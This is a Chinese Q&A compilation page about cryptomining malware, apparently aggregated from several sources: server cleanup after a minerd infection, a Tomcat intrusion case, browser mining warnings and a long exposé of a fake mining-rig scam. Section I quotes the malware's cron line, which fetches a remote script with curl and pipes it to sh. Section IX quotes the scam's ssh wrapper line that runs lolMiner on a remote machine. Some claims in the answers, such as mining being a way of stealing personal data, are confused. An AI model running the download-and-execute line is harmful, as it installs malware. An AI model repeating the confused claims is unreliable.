當前位置:首頁 » 挖礦知識 » 三萬網站正在被挖礦

三萬網站正在被挖礦

發布時間: 2022-09-04 13:06:20

Ⅰ 阿里雲伺服器被挖礦了怎麼辦(純純電腦小白

1. 關閉訪問挖礦伺服器的訪問

iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.

2. chmod -x minerd ,取消掉執行許可權, 在沒有找到根源前,千萬不要刪除 minerd,因為刪除了,過一回會自動有生成一個。

3. pkill minerd ,殺掉進程

4. service stop crond 或者 crontab -r 刪除所有的執行計劃

5. 執行top,查看了一會,沒有再發現minerd 進程了。

6.檢查/var/spool/cron/目錄下發現有個root用戶的定時器文件。

下載腳本的語句:

*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh
病毒文件內容如下,感興趣的可以研究下:

View Code

解決minerd並不是最終的目的,主要是要查找問題根源,我的伺服器問題出在了redis服務了,黑客利用了redis的一個漏洞獲得了伺服器的訪問許可權,http://blog.jobbole.com/94518/然後就注入了病毒,下面是解決辦法和清除工作:

1. 修復 redis 的後門,

配置bind選項, 限定可以連接Redis伺服器的IP, 並修改redis的默認埠6379.
配置AUTH, 設置密碼, 密碼會以明文方式保存在redis配置文件中.
配置rename-command CONFIG 「RENAME_CONFIG」, 這樣即使存在未授權訪問, 也能夠給攻擊者使用config指令加大難度
好消息是Redis作者表示將會開發」real user」,區分普通用戶和admin許可權,普通用戶將會被禁止運行某些命令,如conf
2. 打開 ~/.ssh/authorized_keys, 刪除你不認識的賬號

3. 查看你的用戶列表,是不是有你不認識的用戶添加進來。 如果有就刪除掉.

Ⅱ 求助伺服器被挖礦程序入侵,如何排查

新客戶於最近向我們SINE安全公司咨詢,說他的伺服器經常卡的網站無法打開,遠程連接

伺服器的慢的要命,有時候PING值都達到300-500之間,還經常掉包,聽客戶這么一說,一般

會判斷為受到了CC+DDOS混合流量攻擊,再具體一問,說是機房那面沒有受到流量攻擊,這

就有點奇怪了,不是流量攻擊,還導致伺服器卡,網站無法打開,這是什麼攻擊?為了解決客

戶伺服器卡的問題,我們隨即安排安全工程師對他的Linux伺服器進行了安全檢測與安全部署。

挖礦木馬還設計了挖礦進程如果被客戶強制停止後,會自動啟動繼續挖礦,達到不間斷的挖礦,

仔細檢查發現是通過設置了每個小時執行任務計劃,遠程下載shell挖礦木馬,然後執行,檢查

當前進程是否存在,不存在就啟動挖礦木馬,進行挖礦。

對客戶的linux伺服器進行詳細了安全檢測發現幸虧沒有加密伺服器的數據,以及感染蠕蟲的病

毒,如果數據被加密那損失大了,客戶是做平台的,裡面的客戶數據很重要,找出挖礦木馬後,

客戶需要知道伺服器到底是如何被攻擊的? 被上傳挖礦木馬的? 防止後期再出現這樣的攻擊

狀況。

通過我們安全工程師的安全檢測與分析,發現該伺服器使用的是apache tomcat環境,平台的開

發架構是JSP+oracle資料庫,apache tomcat使用的是2016年的版本,導致該apache存在嚴重

的遠程執行命令漏洞,入侵者可以通過該漏洞直接入侵伺服器,拿到伺服器的管理員許可權,

SINE安全工程師立即對apache 漏洞進行修復,並清除木馬,至此問題得以解決,客戶伺服器

一切穩定運行,網站打開正常。

Ⅲ 手機被別人挖礦是什麼意思

被挖礦是指瀏覽不良網站背後的黑客會通過程序竊取你的個人信息。
一旦出現這種情況,那麼就說明你的個人信息肯定是已經泄露了,而一般的正規網站是不會泄露用戶的個人信息,只有經常瀏覽一些釣魚網站、盜版資源網站和不良網站,才會導致個人信息泄露。另外,申請好友的陌生人,基本都是一些帶著「美女頭像」,且備注的信息都充滿誘導性,而目的就是為了讓我們同意。

Ⅳ 從圖片上看我是否正在挖礦,可為什麼礦池網站無速度顯示。已經過了50分鍾了啊。

貌似沒有挖礦,好像是設置出了問題。你在使用GPU挖礦,你挖的是比特幣還是萊特幣,也或者是其它山寨幣。這個你可以聯系一下礦池的客服,咨詢一下他們,他們相對比較專業一點。如果你挖的是比特幣的話,那你的挖礦設備有點太OUT了!如果挖的是萊特幣,挖礦設備也談不上先進。挖的是其它山寨幣的話勉強還可以。給你幾條建議:人如果挖的是比特幣的建議使用阿瓦隆三代機器,如果是萊特幣也建議你購買asic萊特幣礦機,其它山寨幣就無所謂了。

Ⅳ 被打電話通知手機被挖礦了是真的嗎

被打電話通知手機被挖礦了是騙局。
上百萬安卓手機被黑客劫持用來挖礦,這正是黑客通過惡意廣告重定向騙局對數百萬安卓手機所做的事,目前黑客使用的確切方法還並不完全清楚,但似乎是用戶下載了遭感染的應用後,被迅速重定向到某一網站。該網站明確表明,它正在使用受感染的設備來挖掘加密貨幣,並且只會在用戶輸入有效的CAPTCHA代碼時停止。

Ⅵ 最近聽說進入不良網站,黑客會拿我們的手機挖礦啥的,自動彈出的不良網站我點進去一秒就退了,被挖礦嗎

沒有想的那麼神奇。。現在的不良網站一般都是教人如何賭博。。如何打架什麼的。通常會有賭博網站的連接在裡面。。誘惑你去賭博的。。沒有什麼挖礦什麼的。。退出去以後。重啟下手機。。基本就正常了。。

Ⅶ 當你瀏覽不良網站的時候,黑客們在干什麼

區塊律動 BlockBeats 做了個統計,截至7月9號,全網有超過3萬家網站內置了「挖礦」代碼,只要用戶打開網站進行瀏覽、操作,網站就會調用電腦或手機的計算資源,來進行「挖礦」。

如果你有瀏覽「黃色」網站的習慣,那你也應該注意一下,因為不少「黃色」網站未來增加收入也會加入「挖礦」代碼,除了網站所有者自行添加「挖礦」代碼之外,還有黑客黑入其他網站服務在代碼中,惡意植入「挖礦」代碼木馬的情況。是不是很可怕呢?小夥伴們有沒有遇到過手機莫名其妙發燙的現象呢?

Ⅷ 電腦怎樣做才能防止植入挖礦程序呢

也不難的,安裝了騰訊電腦管家已全面攔截這批包含挖礦程序的網站,還有就是不要隨意打開來歷不明的網址,同時保持安全軟體的開啟狀態,及時攔截危險網頁的惡意行為。據說以色情網站為首的數百個網站被植入挖礦程序,一旦點擊訪問,電腦將會被佔用大量資源「幫助」不法分子挖掘門羅畢等虛擬貨幣

Ⅸ 騙局揭秘:你的礦機真的在挖礦嗎

最近,我收到一位朋友的咨詢,讓我發現了一種新型騙局。

之後的幾天,我又發現有三位朋友中招,他們的被騙經歷和騙子的手法極其相似,都是在某二手交易平台上購買礦機,都是正常挖礦一周後算力突然消失,很可能是同一夥騙子所為。

我想,我該做點兒什麼了。

奇怪的故障

這天,某A向我咨詢,他購買的20台顯卡礦機,突然都不能挖礦了。

具體故障表現為:礦池顯示礦機掉線。

▼由於長時間沒有算力,某A向我咨詢時,礦機已經顯示為失效了。

幫助過頗多小白的我,還是有一定經驗的,我讓他用手感受下礦機出風口的溫度。

▼這是正常挖礦的功耗

▼這是空載時的功耗

可以發現,礦機如果不在挖礦的話,顯卡的功耗會明顯降低,出風口應該基本感受不到溫度。

某A很快給了我答復,出風口是熱的,和之前沒有區別。

顯然,礦機是在工作的。

既然機器在工作,那就可以直接排除網路和礦池的原因。

因為如果和礦池的連接出了問題,挖礦軟體會停止挖礦,顯卡功耗也會降低。

似乎只有一個可能的解釋:機器被黑了,算力被切到了別人的地址上。

既然是系統被黑了,保險起見,最好的辦法就是重裝一下。

經驗告訴我,一個被黑的系統,重裝是最省時省力的辦法,鬼知道黑客會搞什麼幺蛾子,礦機又沒有數據要保留。

在我的指導下,某A成功安裝minerOS,一個專為挖礦定製的系統。

之後,讓我一臉懵逼的事兒來了,居然檢測不到顯卡!!

▼minerOS後台沒有識別到任何顯卡

一台能插8卡的礦機,主板一定會使用各種奇技淫巧來增加PCIE插槽。

常見的方法有:PCIE交換機、帶寬降低到1x、協議使用PCIE 2.0等等,兼容性和穩定性確實一般,偶爾丟一兩張卡是很常見的。

但是,能把8張卡都給丟了的,我真是第一次見到。

轉機

某A和我折騰了好幾個小時,一籌莫展。

就在我幾乎打算放棄遠程調試,打算讓某A把機器寄給我時,某A抱怨了一句:熱死了。

這句話點醒了我,我又讓某A檢查了下出風口的溫度,依然是熱的。

似乎機器還在挖礦,可是明明連顯卡都識別不到。

索性直接讓某A把礦機關機,但是依然保持電源打開,過了一會兒,某A檢查出風口,居然還是熱的。

這就有點兒奇怪了不是?

一不做二不休,不管機器上的防拆貼,我直接讓某A找來螺絲刀,拆機。

這一拆不要緊,真是讓人大吃一驚。

機器里只有一個小小的工控板,幾根電熱絲,一個小小的電源,還有一些磚頭,機箱兩側是暴力風扇。

▼此處某A不同意使用他的礦機圖片,請根據此示意圖自行腦補畫面。

不用說,某A被騙了。

不得不說,騙子的想像力還是很豐富的。

機箱里的磚頭是配重用的,電熱絲顯然是用來產生熱量,讓你以為機器在工作。

工控板里刷個系統,再配個電源,齊活。

不解

某A認為他已經足夠小心了,走的是二手交易平台,並且正常挖了一周才確認收貨的。

很早以前就有一種騙局,騙你購買雲算力或者所謂的「礦機」,其實根本就不能挖礦,只能連接騙子提供的所謂「礦池」,上面給你顯示點兒算力,每天給你打點兒幣,說是挖礦收益。

算力只是騙子搭建的網站上的數字,收益其實是騙子從你買雲算力或者礦機的幣中拿出一點兒轉給你的。

等上當受騙的人足夠多了,騙子就捲款跑路,這類騙局最著名的當屬「蝸牛星際」。

其實這種騙局很容易識破,只要你要求必須能在第三方礦池挖礦,就可以了。

第三方礦池會公正地顯示算力,顯然這種騙局中並沒有真實算力,因此可以識破。

某A是知道這種騙局的,因此他強調必須要在F2Pool能夠顯示算力,並且收益要是F2Pool支付的,這至少能保證算力是真實存在的。

經過我的檢查,某A收到的收益,確確實實是從F2Pool的地址支付的,可以在鏈上查到,並且也能在F2Pool上查到相關挖礦記錄。

所以,算力是真實存在的,如假包換。

但是,機箱里的這些東西,是不可能產生算力的,到底算力從何而來呢?

某A再三確認,這些機器收到後沒有任何其他人碰過,不存在被調包的可能。

我決定仔細研究一番。

由於這台機器已經重裝過系統,我讓某A又找來另一台機器。

揭秘

經過一番排查,我還真找到了貓膩,不由讓我贊嘆,這騙子太聰明了。

▼這是常用的以太坊挖礦工具lolMiner是吧,我一開始也是這么認為的。

▼查看一下它的大小,居然只有48個位元組,要知道正常的lolMiner的可執行文件應該在8MB左右。

▼查看下內容,這個lolMiner居然是個腳本。

大家是怎麼啟動挖礦的呢?使用這行命令對吧:

./lolMiner.exe --algo ETHASH --pool 礦池地址 --user 錢包地址.礦機名

因為這台機器上的lolMiner並不是真實的挖礦程序,而是個腳本,上面的命令行參數會補全到腳本里。

最終執行的其實是這個命令:

ssh [email protected] "~/lolminer/lolMiner" --algo ETHASH --pool 礦池地址 --user 錢包地址.礦機名

這個命令的功能是什麼呢?

遠程登錄 http://xxx.xxx.xxx.xxx 這台機器,在遠程的機器上執行挖礦程序lolMiner,並把程序的輸出傳輸到本地顯示,挖礦其實是在騙子手裡的真礦機上進行的。

騙子還很貼心地配置了ssh私鑰免密碼登陸,真真正正地做到了與真實的lolMiner操作沒有區別。

估計看到這里,沒一定技術基礎的朋友一定暈了,沒關系,我們畫張圖,理順下。

▼正常的挖礦

▼某A的「礦機」

看出區別了嗎?

其實真正在挖礦的是騙子手裡的真礦機,某A手裡的假礦機只不過是給真礦機發了個指令,這也是為什麼騙子手裡的真礦機能知道某A的挖礦賬號的原因。

騙子手裡的那些真礦機會把挖礦日誌傳回來,顯示在某A手裡的假礦機上,看起來假礦機是在挖礦。

因為騙子手裡的真礦機在某A的地址上挖礦,所以礦池有顯示,並會支付收益。

因此,某A會以為手上的這台假礦機在挖礦。

沉甸甸的磚頭做配重,風扇吹出熱乎乎的風,配合上不斷跳動的挖礦日誌,如假包換的礦池算力顯示,還有真金白銀的收益,真是完美的騙局!

無奈

一句話,小白礦工,真的太苦了,才出虎穴又入狼窩。

如果說「假礦池」這種坑還可以躲避的話,小白很難避免受到這種「假礦機真算力」騙局的欺騙。

從某A發給我的聊天截圖來看,騙子是那麼的真誠,耐心指導,消息秒回。

騙子在某二手平台上的信用分也很高,銷售礦機的價格又是那麼的優惠,比行情價低了兩千多。

機器到手後,上面都是防拆貼,你拆了,人家名正言順地說是你調包,不退不換。

今天是磚頭,也許拆了能看出來,明天要是換成報廢的顯卡呢?你從外觀真看不出來。

今天這個腳本只有幾十KB,如果下次人家編譯一個大小差不多的二進制文件呢?

除了逆向工程,否則你真沒辦法知道這個程序是不是真的在用你的礦機挖礦,顯然不是小白的能力范圍。

就算你刷了自己的系統,人家一句只兼容提供的系統,你也沒話說。

畢竟,礦機配置千奇百怪,系統不兼容需要額外調試也是很正常的。

你只有10天時間,只要忽悠你10天,錢就到騙子手裡了,人家可以直接關了真礦機跑路。

賣給某A礦機的這個騙子,現在就已經消失了,消息不回,電話不接,連地址都是假的。

啟示

在這個浮躁的環境下,所有人都幻想著一夜暴富,騙子利用的正是這點。

當你覺得有利可圖的時候,請務必問自己三個問題:

你賺的錢是哪裡來的?

你相比於其他人,有什麼優勢,為什麼是你賺別人的錢而不是反過來?

你真的了解你所投資的東西嗎?

如果某A不是過於自信,而是更多地了解一下礦圈,或者在大量拿貨之前,先拿一兩台試試,又或者是找一個第三方來檢查下礦機,是不是就不會被騙了呢?

很多朋友加我的微信第一句話:李老師有沒有什麼群可以讓我學習一下?

這讓我想起了我小時候,練習題買了一大堆,似乎買了你就會了,就能考高分了。

加一大堆亂七八糟的群,真的有用嗎?

我們生活在一個信息過載的時代,你需要做的是從海量的垃圾信息中,尋找真實和有用的信息,而不是浸泡在更多垃圾信息里幻想自己也是牛人。

有巨大價值的信息,會出現在幾百人個陌生人組成的群里嗎?

就算是一個本來有價值的信息,出現在這種群里之後,還有價值嗎?

商業的本質就是信息差,眾所周知周知的信息,哪裡還有信息差可言?哪裡還有價值呢?

更別說群里各種騙局橫生,某A就是在群里結識的騙子,繼而被騙的。

從某A的被騙,有感而發,不知不覺又寫了好幾千字。

騙局還在繼續,如果你也是騙局的受害者,請分享你的經歷,避免更多人受害。

Ⅹ 天下沒有免費的午餐,當你瀏覽違規網站時,實際上是幫別人挖礦

隨著互聯網 科技 的高速發展,智能手機基本貫穿了人們的生活,這也使得人們的生活方式朝著更有效、更方便的方向發展。 然而,互聯網的普及一直是利弊相同的,雖然互聯網對用戶來說更方便,但或多或少都有一定的風險。

以瀏覽一些不 健康 的網站為例,在絕大多數人的意識中,悄悄瀏覽不 健康 的網站是不為人所知的,頂多有時候手機會被病毒入侵。

像有時候網頁上會突然跳出提醒你手機正在遭受病毒攻擊的頁面,然後讓你下載殺毒的軟體,實際上,這個殺毒的軟體就是病毒。當然,對於有經驗的人來說,這也見怪不怪了,早就習以為常,更何況處理這樣的頁面,有著多種方法。

除了這點以外,事實上,違規網站通常存在竊取用戶個人信息的行為,如果被意圖不好的人使用,必然會對用戶的財產安全構成威脅。畢竟,所有電信詐騙的源頭通常都是個人隱私被泄露,所以當你瀏覽頁面時,可能頁面幕後的「黑客」正在狂笑不止。

當然,個人信息泄露只是一方面,其實當你瀏覽不 健康 網站時,實際上是在幫他人挖礦。我們都知道,大部分互聯網公司都是靠廣告流量來達到盈利的目的,這意味著運營需要維護網站的廣告流量需求。

特別是一些單純依靠廣告謀生的網站,如果你想獲得更多的收入,那麼你需要打開另一捷徑。因此,在這種背景下,一些站點就將目光放在了虛擬貨幣上。

據相關統計顯示,目前有2% 的網站依靠用戶來挖礦,以此賺取虛擬貨幣。 對於普通人來說,這可能是一項艱巨的任務,可對於網站來說,它只需要在網頁上嵌入一串虛擬貨幣的代碼就可將其完成。 用戶只需打開頁面瀏覽,代碼就會自動掃描你的手機或電腦。

據不完全統計,目前已有數億台設備用於挖礦,其中大部分被成人站點利用。因此,當用戶瀏覽不 健康 的網站時,該設備可能就會被黑客用來挖礦,當該設備具有較高的負載率時,它將會出現發熱甚至卡頓的情況,因此大家最好不要瀏覽不 健康 的網站。

在一般情況下,用戶瀏覽網頁的時間並不長,所謂日積月累,隨著時間的推移,網站也會積累大量的數據和利益。

據估計,如果一個頁面一天有20人瀏覽並點擊廣告,網站將會獲得200元左右,那麼一個月下來,收入也算是比較可觀。可是大家想一想,這還只是20人,要是人數較多,那麼可以想像會有多麼大的金額產出。

如果你擔心在瀏覽網頁時被別人利用,那麼也可以用一些插件來阻攔,當然,最好的方法自然是不瀏覽,畢竟插件也不是好獲得的。

說到底,天下沒有免費的午餐,當你瀏覽不 健康 的網站時,它背後的黑客會通過網路程序竊取你的個人信息,或者利用你的設備挖礦,最終使設備報廢。

大家是如何認為的呢? 喜歡潤界本地化,請多多關注!

熱點內容
挖礦模擬器下載最新版本 發布:2024-12-26 10:52:24 瀏覽:881
期貨現貨合約怎麼買 發布:2024-12-26 10:48:09 瀏覽:601
如何去正規醫院體檢中心 發布:2024-12-26 10:40:05 瀏覽:354
華南理工區塊鏈 發布:2024-12-26 10:35:46 瀏覽:854
trx4回正抖動 發布:2024-12-26 10:26:14 瀏覽:897
刀塔傳奇挖礦什麼時 發布:2024-12-26 10:22:46 瀏覽:420
比特幣冷錢包看余額 發布:2024-12-26 09:49:19 瀏覽:929
區塊鏈技術在票據業務的應用 發布:2024-12-26 09:44:32 瀏覽:255
交易所最低usdt可以買多少 發布:2024-12-26 09:37:39 瀏覽:580
美國芝加哥交易所把比特幣 發布:2024-12-26 09:37:39 瀏覽:49